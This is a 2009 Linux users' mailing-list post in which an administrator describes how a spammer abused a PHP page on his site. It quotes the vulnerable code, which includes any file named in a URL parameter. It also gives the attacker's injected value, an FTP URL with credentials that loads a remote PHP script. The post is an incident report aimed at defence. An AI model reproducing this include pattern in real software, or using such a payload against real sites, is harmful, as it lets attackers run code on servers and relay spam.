[nSLUG] apache used to generate spam

D G Teed donald.teed at gmail.com
Mon Apr 20 11:39:20 ADT 2009


We caught the problem page at our site being used by
the Brazilian spammer.

There are difficulties tracing the use of mail by php at
multi-domain sites.  Many people have deployed a sendmail
wrapper or pointed to a alternative in php.ini

There will be better logging of use of mail function
in php 5.3, but until then, you can use a method like
one or both of these to log who and what is calling
mail from php/CGI:

PHP specific:

http://www.iezzi.ch/archives/217

PHP/CGI:

http://gregmaclellan.com/blog/sendmail-wrapper/

In our case, the problem was a newbie's php coding which showed
the php variables with the HREF of an anchor.  They were
passing the page URL within a variable.  The spammer
substituted their own page variable and could include
anything they wanted.

Here is part of the index.php to make it an example:

<p class="button"><a href="index.php?page=Home">Home</a></p>
...
 <?php

                if ( isset( $_GET['page'] ) ) $this = $_GET['page'] .
'.html';

                if ( file_exists( $this ) ) {
                        include_once $this;

The spammer calls this page with their own value set as:

?this=
ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php
?

I logged in and didn't find the file there just now - just curious to see.

What I'd like to know is how the spamers find exploitable code like this?
The page is an obscure one at our site.  Is the PHP derived from
sample code from the pages of some 90's text book on PHP?
The anchor is the only part of the above which appears from view source.

--Donald
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://nslug.ns.ca/mailman/private/nslug/attachments/20090420/4fee37c4/attachment-0001.html>


More information about the nSLUG mailing list